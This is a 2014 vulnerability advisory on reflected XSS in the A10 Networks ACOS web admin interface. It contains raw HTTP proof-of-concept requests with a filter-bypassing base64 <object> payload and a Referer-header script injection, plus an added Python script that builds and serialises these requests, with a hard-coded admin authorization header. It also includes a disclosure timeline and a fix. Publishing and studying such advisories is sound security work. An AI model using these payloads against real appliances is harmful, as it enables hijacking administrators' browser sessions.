
    20-06-2014

    A10 Networks

    A10 Networks Reflected XSS vulnerability

    Quantum Leap Advisory: A10 Networks Reflected XSS in ACOS[1] 2.7.0-P2 – Advisory #QLA140505
    Affected Product: ACOS 2.7.0-P2 (build 53); older versions may be affected too. Tested on SoftAX[2].
    Credits: Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

    Executive Summary

    Using a specially crafted HTTP request, it is possible to exploit a lack of neutralization[3] in pages whose output includes user-submitted content. Successful exploitation results in the execution of arbitrary HTML and script code in the user's browser, in the context of the vulnerable web application, through a reflected XSS.

    Proof of Concept

    The following paragraphs show the two kinds of XSS we found in the web administrative interface.

    404 error page leads to XSS

    Submitting arbitrary input in an HTTP request for a non-existent resource makes the server generate a 404 error page. The generated error page includes the user input without neutralizing it, which leads to reflected XSS. Since neither the "<script>" tag nor whitespace characters are allowed in this input, the vulnerability can be exploited with an "<object>" tag whose data: URI carries the sample payload "<script>alert(1)</script>" base64-encoded; the sequence /**/ takes the place of the space between the tag name and its attribute.

    GET ///<object/**/data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    Figure 1 shows the arbitrary code executed in the user browser context.


    Figure 1 – A10 Networks Reflected XSS vulnerability – Object via GET

    Another entry point is the Referer header. In this case the <script> tag is allowed and the PoC is straightforward.

    GET /fake HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Referer: "/><script>alert(2)</script><Fake"
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    Figure 2 shows the arbitrary code executed in the user browser context.


    Figure 2 – A10 Networks Reflected XSS vulnerability – Script via Referer

    Custom error page leads to XSS

    Submitting arbitrary input in an HTTP request after authenticating makes the application generate a custom error page. The generated error page includes the user input without neutralizing it, which leads to reflected XSS.

    GET /US/08a53c111eb0df06a6b3661db44937/sys_start.frm?=""<object/**/data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">=1 HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Authorization: Basic YWRtaW46YTEw

    Figure 3 shows the arbitrary code executed in the user browser context.


    Figure 3 – A10 Networks Reflected XSS vulnerability – Object via GET
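    The following Python script is an added example written for this page; it is not part of the original advisory and is not A10 code. It rebuilds the payload the 404-page PoC relies on (the base64 data: URI inside an <object> tag, with /**/ standing in for whitespace), serialises the three PoC requests shown above as raw HTTP so that no client library URL-encodes the payload, and applies one reflection oracle to a hypothetical vulnerable error page and to its hardened counterpart (HTML entity encoding, as in reference [3]). The error-page templates, the filter model and the helper names are assumptions made for illustration; the host, paths and headers are copied from the captures above, and the hex path segment in the authenticated request is session-specific and would have to be replaced.

```python
import base64
import html
import re

# Plain-text script that the advisory's payload carries in base64 form.
INLINE_SCRIPT = b"<script>alert(1)</script>"
HOST = "192.168.1.210"  # target host exactly as it appears in the captures
# Authorization header copied from the authenticated PoC capture.
AUTH_HEADER = "Basic YWRtaW46YTEw"


def object_payload(script: bytes = INLINE_SCRIPT) -> str:
    """Build the <object> data: URI payload used by the advisory's PoCs.

    The reflected value may contain neither a literal <script> tag nor any
    whitespace, so the script is hidden in a base64 data: URI and the tag
    name is separated from its attribute with /**/ instead of a space.
    """
    b64 = base64.b64encode(script).decode("ascii")
    return f'<object/**/data="data:text/html;base64,{b64}"></object>'


def passes_filter(value: str) -> bool:
    """Model (assumption) of the two input constraints the advisory describes
    for the 404 page: no literal <script> tag and no whitespace characters."""
    return "<script" not in value.lower() and re.search(r"\s", value) is None


def build_request(path: str, headers: dict) -> bytes:
    """Serialise a raw HTTP/1.1 GET as the captures show it, so the payload
    reaches the sink byte-for-byte rather than percent-encoded."""
    lines = [f"GET {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def poc_requests() -> dict:
    """The three injection points from the advisory as raw requests."""
    p = object_payload()
    return {
        "404-path": build_request("///" + p, {"Host": HOST}),
        "referer": build_request(
            "/fake",
            {"Host": HOST, "Referer": '"/><script>alert(2)</script><Fake"'},
        ),
        "custom-error": build_request(
            f'/US/08a53c111eb0df06a6b3661db44937/sys_start.frm?=""{p}=1',
            {"Host": HOST, "Authorization": AUTH_HEADER},
        ),
    }


# --- Hypothetical models of the sink (illustration only, not ACOS code) ----
TEMPLATE = "<html><body><h1>Error</h1><p>Request: {}</p></body></html>"


def vulnerable_error_page(reflected: str) -> str:
    """Unsafe: request data is interpolated into the HTML body unchanged."""
    return TEMPLATE.format(reflected)


def fixed_error_page(reflected: str) -> str:
    """Hardened: entity-encode the data for an HTML element context (OWASP
    XSS Prevention Cheat Sheet rule #1, reference [3])."""
    return TEMPLATE.format(html.escape(reflected, quote=True))


def is_reflected_unescaped(body: str, marker: str) -> bool:
    """Oracle shared by all three PoCs: True when the marker reaches the
    response body byte-for-byte, i.e. it was neither encoded nor stripped."""
    return marker in body


if __name__ == "__main__":
    p = object_payload()
    print("payload satisfies filter:", passes_filter(p))
    for name, raw in poc_requests().items():
        print(f"--- {name} ---\n{raw.decode('latin-1')}")
    print("vulnerable page reflects:", is_reflected_unescaped(vulnerable_error_page(p), p))
    print("fixed page reflects:     ", is_reflected_unescaped(fixed_error_page(p), p))
```

    Against a live target the same oracle is applied to the real response body: send the raw bytes from poc_requests() over a socket, then call is_reflected_unescaped() with the payload string. A response in which the payload comes back entity-encoded (as fixed_error_page() produces) indicates the output is neutralized; a byte-for-byte echo reproduces Figures 1 to 3.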

    Solution

    To fix the A10 Networks reflected XSS vulnerability, upgrade to ACOS 2.7.0-P3 or later.

    Disclosure Timeline

    2013-05-11 – A10 Networks Reflected XSS vulnerability discovered
    2013-05-28 – Initial vendor notification
    2013-05-30 – The vendor acknowledged the vulnerability (bug 128069)
    2013-05-30 – First attempt to coordinate the vulnerability disclosure, no response
    2013-06-19 – The vendor fixed the vulnerability
    2013-07-10 – Second attempt to coordinate the vulnerability disclosure, no response
    2014-03-30 – Last vendor notification
    2014-04-02 – The vendor did not respond
    2014-04-02 – Public advisory

    References

    [1] http://www.a10networks.com/about/technology_platform_acos.php
    [2] http://www.a10networks.com/glossary/SoftAX.php
    [3] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet